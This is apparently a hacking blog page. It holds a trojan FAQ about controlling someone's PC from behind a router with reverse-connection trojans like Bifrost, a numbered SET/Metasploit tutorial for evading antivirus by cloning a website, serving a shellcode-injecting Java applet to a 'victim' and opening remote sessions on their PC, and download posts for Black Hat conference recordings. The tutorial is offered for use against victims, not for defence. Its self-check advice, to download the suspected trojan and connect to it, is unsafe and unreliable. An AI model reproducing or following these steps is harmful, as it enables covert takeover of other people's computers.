
What do I do when someone is behind a router and I want to control their PC with a trojan? -
You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember, when someone is behind a router and you're using IPstealer to get hold of their IP address, you are actually getting their router's IP, not their actual PC's IP. The router will have the person's Internet IP (WAN IP) and their PC will have a different IP - their LAN IP.


How do I check if my own PC is infected with a trojan? -
Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list, you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port.

Bypass Antivirus using S.E.T

Bypass antivirus using Multi PyInjector shellcode injection with SET & Metasploit.

Requirement:-


Victim's OS: Windows.

Attacker: S.E.T, Metasploit.

(1)Open a terminal and type the following commands

sudo bash

cd /opt/set

./set

(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”

(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)

(7)Now choose 16 “Multi PyInjector Shellcode Injection”,

(8)Port of the attacker computer. In this example I use port 443

(9)Select the payload you want to deliver via shellcodeexec; press Enter here

(10)Now again select Port of the attacker computer. In this example I use port 444 and 445

(11)Select the payload you want to deliver via shellcodeexec; press Enter here

(12)Send your IP to the victim. As soon as he opens the link & runs the Java applet, you have access to the victim's PC

(13)sessions -l

(14)sessions -i I.d

Wednesday, January 9, 2013

Blackhat USA 2012: Conference Official Recordings & Tools Released


Blackhat USA 2012 [2012, ENG]

English | h264, yuv420p, 1200x600, 14.98 fps | aac, 44100 Hz, mono | 14.38 GB
Genre: Video Training


Here are the videos for all the sessions of Blackhat USA 2012. It also includes a few of the tools released during this conference.

Content
-https://www.blackhat.com/html/bh-us-12/schedule/briefings-25.html
-https://www.blackhat.com/html/bh-us-12/schedule/briefings-26.html




Link Download

Tuesday, January 8, 2013

Blackhat USA 2011: Conference Official Recordings


Blackhat USA 2011 [2011, ENG]

English | h264, yuv420p, 1200x600, 14.98 fps | aac, 44100 Hz, mono | 16.19 GB
Genre: Video Training


The official recordings from the Blackhat USA 2011 Conference



More: http://www.securelist.com/en/blog/208193069/BlackHat_USA_2011

Link Download